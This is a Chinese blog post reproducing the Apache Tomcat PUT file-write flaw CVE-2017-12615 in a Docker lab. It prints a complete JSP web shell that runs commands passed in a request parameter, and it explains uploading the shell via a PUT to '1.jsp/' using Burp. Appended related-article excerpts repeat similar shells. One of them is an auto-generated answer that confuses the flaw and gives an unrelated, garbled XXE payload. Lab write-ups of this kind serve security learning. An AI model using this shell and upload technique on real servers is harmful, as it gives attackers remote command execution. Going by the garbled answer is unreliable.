Tomcat PUT 方法任意写文件漏洞(CVE-2017-12615)复现

最新推荐文章于 2024-05-17 09:16:23 发布
最新推荐文章于 2024-05-17 09:16:23 发布
阅读量718 收藏 10
点赞数 7
分类专栏: 漏洞 文章标签: tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47498728/article/details/135398270
版权

前言

Tomcat PUT 方法任意写文件漏洞(CVE-2017-12615)
只要用到了该中间件&框架,且其版本处于漏洞版本之中,就会存在该漏洞。
Tomcat版本:7.0.0-7.0.79、8.5.19

环境搭建

前提:centos部署好docker,部署流程可参考这里

1.搜索漏洞镜像

语法:docker search 镜像名字

在这里插入图片描述

2.下载漏洞镜像

语法:docker pull 镜像名字

在这里插入图片描述

3.验证漏洞镜像是否下载成功

语法:docker images		//此命令会列出本地已下载的镜像

在这里插入图片描述

4.运行漏洞镜像

语法:docker run -d -p 8081:8080 镜像名字
-d	//后台运行
8081:8080	//主机端口号:容器端口号(后面实际访问的是主机端口号)

在这里插入图片描述

5.验证漏洞镜像是否运行成功

语法:docker ps	//列出当前运行的镜像

在这里插入图片描述

6.网页验证

网址:主机地址:主机端口号

如果docker部署在虚拟机,那主机地址就是虚拟机的地址
如果docker部署在服务器,那主机地址就是服务器的地址
主机端口号就是前面自己映射的端口号,在我这里就是8081

在这里插入图片描述

漏洞复现

1.浏览器设置代理(以IE为例)

在这里插入图片描述

2.启动burp抓包工具

在这里插入图片描述

3.重新刷新搭建好的环境

此时网页的请求会被burp抓取
在这里插入图片描述

4.将获取到的请求发送给Repeter进行修改

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5.对请求进行修改

  • 填写jsp文件内容(直接复制粘贴)
<%
    if("magedu".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

注:第一行的magedu和pwd可以自行设置,主要用于后面的漏洞利用,格式为:pwd=magedu,可以理解为密码
  • 修改请求方法:GET–>PUT
  • 上传jsp文件,这里文件名我用的是1.jsp/(/一定要加,不然无法上传)
    在这里插入图片描述上传成功如下图显示
    如果提示错误,多半是文件名格式错误
    在这里插入图片描述

6.关闭服务器代理,利用shell执行命令

此时,i的值就是linux的命令,这里我用ls,pwd进行演示
在这里插入图片描述
在这里插入图片描述

漏洞原理

漏洞本质是 Tomcat 的 web.xml 配置了可写(readonly=false),导致我们可以往服务器写(PUT)文件:

<servlet>
	<servlet-name>default</servlet-name>
	<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
	<init-param>
		<param-name>debug</param-name>
		<param-value>0</param-value>
	</init-param>
	<init-param>
		<param-name>listings</param-name>
		<param-value>false</param-value>
	</init-param>
	<init-param>
		<param-name>readonly</param-name>
		<param-value>false</param-value>
	</init-param>
	<load-on-startup>1</load-on-startup>
</servlet>

漏洞总结

tomcat本身不允许上传 jsp 文件,但是1.jsp/ 加了 / 就不是 jsp 文件,所以文件可以成功上传。系统保存文件时因为不能存在/字符,所以/被忽略了,所以文件名从 1.jsp/ -> 1.jsp,至此jsp文件完成了上传并保存。

Spring� 胡
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tomcat 通过 PUT 方法任意文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1050
CVE-2017-12615 对应的漏洞任意文件入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件Tomcat设置了权限(readonly=false),导致可以使用PUT方法上传任意文件
Tomcat PUT方法任意文件漏洞CVE-2017-12615
SoulCat
01-29 3448
Tomcat PUT方法任意文件漏洞CVE-2017-12615漏洞概述: 如果Tomcat开启了PUT方法(默认关闭,有点鸡肋,但是有些页面需要PUT,无法关闭),则有可能存在远程命令执行漏洞,攻击者可以利用PUT方法上传jsp文件,从而造成远程命令执行,getshell等。 漏洞版本: 7.0.0~7.0.79 漏洞搭建: 利用vulhub漏洞平台(简单粗暴,一键生成漏洞!)...
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容
TOMCAT PUT方法任意文件(CVE-2017-12615)-靶场复现
m0_66376444的博客
04-06 566
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。其实tomcat会对上传的文件内容进行限制,比如说禁止上传 .jpg 后缀的文件,只不过,这个过滤机制可以通过一些windows 或着 linux的特性绕过。2、修改请求协议PUT加文件名,在请求主体内入可执行代码,点击发送。本次测试版本:Tomcat版本:8.5.19。
漏洞复现Tomcat PUT方法任意文件漏洞CVE-2017-12615
weixin_42090431的博客
01-02 507
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)
TomcatPUT的上传漏洞(CVE-2017-12615)
小小猪的博客
11-19 3515
Tomcat远程代码执行漏洞复现(CVE-2017-12615) 漏洞描述: 当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 受影响的版本: Apache Tomcat 7.0.0 to 7.0.79 利用条件: Apache
中间件安全—Tomcat常见漏洞
剁椒鱼头没剁椒的博客
02-22 5177
链接。
Tomcat PUT方法任意文件CVE-2017- 12615漏洞复现
weixin_51198941的博客
09-06 316
CVE-2017-12615是Apache Tomcat的一个远程代码执行漏洞。该漏洞影响Apache Tomcat 7.0.0至7.0.79版本(7.0.81修复不完全)。漏洞原理Tomcat 运行在 Windows 主机上,且启用了HTTP PUT。
cve-2017-12615_cmd.py
04-26
CVE-2017-12615的稀有检测脚本,方便使用和测试,本脚本请谨慎使用!
Tomcat PUT方法任意文件漏洞(CVE-2017-12615)
来到了学渣的博客
08-18 1551
Tomcat启用了HTTP PUT请求方法并且将 readonly 初始化参数由默认值设置为 false,就能执行任意文件漏洞 Tomcat 7.x版本内web.xml配置文件内默认配置无readonly参数,需要手工添加,所以默认配置条件下不受此漏洞影响。 配置文件为 \conf\web.xml 利用vulhub搭建漏洞环境 目录为tomcat/CVE-2017-12615 环境启动成功 直接构造如下poc PUT /shell1.jsp/ HTTP/1.1 Host:目标ip Accep
【vulhub漏洞复现】通过 PUT 方法Tomcat 任意文件漏洞 (CVE-2017-12615)-02
书山上的云的博客
01-11 3560
一、漏洞原理 Tomcat设置了权限(readonly=false),导致我们可以向服务器文件CVE-2017-12615:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的)。 <servlet> <servlet-name>default</servlet-name> <servlet
通过PUT方法Tomcat任意文件漏洞 CVE-2017-12615 漏洞复现
ADummy的博客
02-25 367
通过PUT方法Tomcat任意文件漏洞CVE-2017-12615) by ADummy 0x00利用路线 ​ Burpsuite抓包—>发包—>入shell—>命令执行 0x01漏洞介绍 ​ Tomcat设置了许可权(readonly = false),这导致我们可以将文件入服务器。 <servlet> <servlet-name>default</servlet-name> <servlet-class&
Tomcat put方法任意文件上传漏洞CVE-2017-12615复现
君莫hacker的博客
09-15 6694
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现1. 访问主页2. 漏洞测试3. 上传jsp木马--命令执行4. 上传成功,执行命令5. 上传jsp一句话木马6. 上传成功,冰蝎连接0x04 漏洞修复 0x01 漏洞介绍 漏洞描述 在一定条件下,攻击者可以利用这个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险 漏洞编号 CV
Tomcat利用put任意文件漏洞(CVE-2017-12615)实验复现
weixin_51641247的博客
02-12 545
Tomcat put方法任意文件上传漏洞复现; burpsuit上传文件, 利用冰蝎进行连接,管理网站
Tomcat 启动闪退问题解决方案详解
最新发布
学IT,找陈寒
05-17 822
通过本文的介绍,相信读者已经对 Tomcat 启动闪退问题有了更深入的理解,并掌握了解决这些问题的方法。在实际应用中,如果遇到其他未列出的问题,可以结合具体情况进行分析和解决。Tomcat 是一个稳定且强大的 Web 服务器和 Servlet 容器,正确配置和使用能够为项目的开发和部署提供便利。😊🙏Java面试技巧Java面试八股文 - 掌握面试必备知识(目录篇)Java学习路线2023年完整版Java学习路线图AIGC人工智能Chat GPT是什么,初学者怎么使用Chat GPT,需要注意些什么。
cve-2017-12615漏洞复现
06-28
### 回答1: cve-2017-12615漏洞是Apache Tomcat服务器中的一个远程代码执行漏洞。攻击者可以通过发送特定的HTTP请求来利用该漏洞,从而在服务器上执行任意代码。 要复现漏洞,需要满足以下条件: 1. 目标服务器上运行的是Apache Tomcat 7..至7..79版本或8.5.至8.5.16版本。 2. 目标服务器上存在一个Web应用程序,其中包含一个可上传文件的Servlet。 3. 目标服务器上的Web应用程序未正确配置,允许攻击者上传包含恶意代码的JSP文件。 攻击者可以通过发送以下HTTP请求来利用该漏洞: PUT /test.jsp/ HTTP/1.1 Host: target.com Connection: close Content-Length: 100 <% out.println("Hello, world!"); %> 其中,test.jsp是攻击者上传的包含恶意代码的JSP文件。攻击者还需要在请求中包含一个特殊的Content-Type头,以触发漏洞。 如果攻击成功,攻击者就可以在目标服务器上执行任意代码,包括获取敏感信息、修改数据或者控制整个服务器。因此,建议管理员及时升级Apache Tomcat服务器,或者对Web应用程序进行正确的配置和安全审计。 ### 回答2: CVE-2017-12615漏洞是Apache Tomcat中的一个目录遍历漏洞,它使得攻击者能够通过发送特定的HTTP请求,获取Tomcat服务器上应用程序的敏感信息。这种漏洞的原因是Tomcat默认启用了WebDAV(Web Distributed Authoring and Versioning)服务,攻击者可以发送特定的HTTP PUT请求利用该漏洞向服务器发送恶意的WAR文件,并且可以通过使用Windows UNC路径造成RCE漏洞。 下面是CVE-2017-12615漏洞复现步骤: 1.安装Tomcat服务器 2.根据Tomcat的版本,下载特定的利用工具(e.g.,ysoserial.jar 或者wmx.jar)。 3.使用ysoserial.jar或者wmx.jar(如图所示)创建一个恶意文件,并通过PUT请求将它上传到目标服务器。 4.在表单中输入如下内容: PUT /test.txt/WEB-INF/web.xml HTTP/1.1 Host: [Tomcat address]:[listening port] User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/xml Content-Length: 284 <?xml version="1.0"?> <!DOCTYPE x [ <!ELEMENT x ANY> <!ENTITY % p1 SYSTEM "file:///c:/windows/system32/test.bat"> <!ENTITY % p2 "<!ENTITY p3 '′%p1;%p1;′'>"> %p2;%p3; ]> 5.从服务器上获取war文件并进行反序列化,验证漏洞是否真实存在。 6.如果漏洞存在,则攻击者可以使用该漏洞获取Tomcat服务器上应用程序的敏感信息,并且可以在服务器上执行任意命令。 为了缓解该漏洞产生的风险,我们可以通过禁用WebDAV服务、运行Tomcat服务器以非特权用户身份、 对上传文件类型进行限制, 或者升级最新的Tomcat版本等方式来解决该漏洞。 ### 回答3: CVE-2017-12615 是 Apache Tomcat 中的一个远程代码执行漏洞。该漏洞存在于 Tomcat 7.0.0 到 7.0.79 版本和 Tomcat 8.5.0 到 8.5.16 版本中。攻击者可以利用该漏洞通过 HTTP 协议上传恶意 JSP 文件并执行任意命令。 为了演示该漏洞复现,我们需要先搭建一个虚拟机环境来运行 Apache Tomcat。在这里,我们以 Ubuntu 16.04.6 LTS 作为漏洞环境的操作系统。 安装 Apache Tomcat 首先,我们需要安装 Apache Tomcat。在终端窗口中执行以下命令: sudo apt-get update sudo apt-get install tomcat7 安装完成后,我们可以通过访问以下 URL 来确认 Tomcat 是否成功安装: http://localhost:8080/ 如果可以看到 Tomcat 的欢迎页面,则说明安装成功。 复现漏洞 接下来,我们需要复现 CVE-2017-12615 漏洞。步骤如下: 1. 创建一个名为 test.jsp 的 JSP 文件,该文件包含以下代码: <% if ("POST".equals(request.getMethod())) { Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line = in.readLine()) != null) { out.println(line); } in.close(); } %> 2. 通过以下命令创建一个名为 test.war 的 Web 应用程序文件: jar -cvf test.war test.jsp 3. 接下来,我们需要在 Tomcat 的 webapps 目录下创建一个名为 test 目录。接着,将上传的 test.war 文件复制到该目录下: sudo mkdir /var/lib/tomcat7/webapps/test sudo mv test.war /var/lib/tomcat7/webapps/test/ 4. 通过以下 URL 访问 test.jsp 文件,可以发现该页面中含有一个命令执行的输入框: http://localhost:8080/test/test.jsp 5. 在输入框中输入以下命令,即可执行该命令并返回结果: cmd=ls 我们可以看到,这个漏洞可以允许攻击者上传包含恶意代码的 JSP 文件并执行恶意命令,扰乱服务器系统。因此,我们需要对 Apache Tomcat 应用程序服务器进行及时修复。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值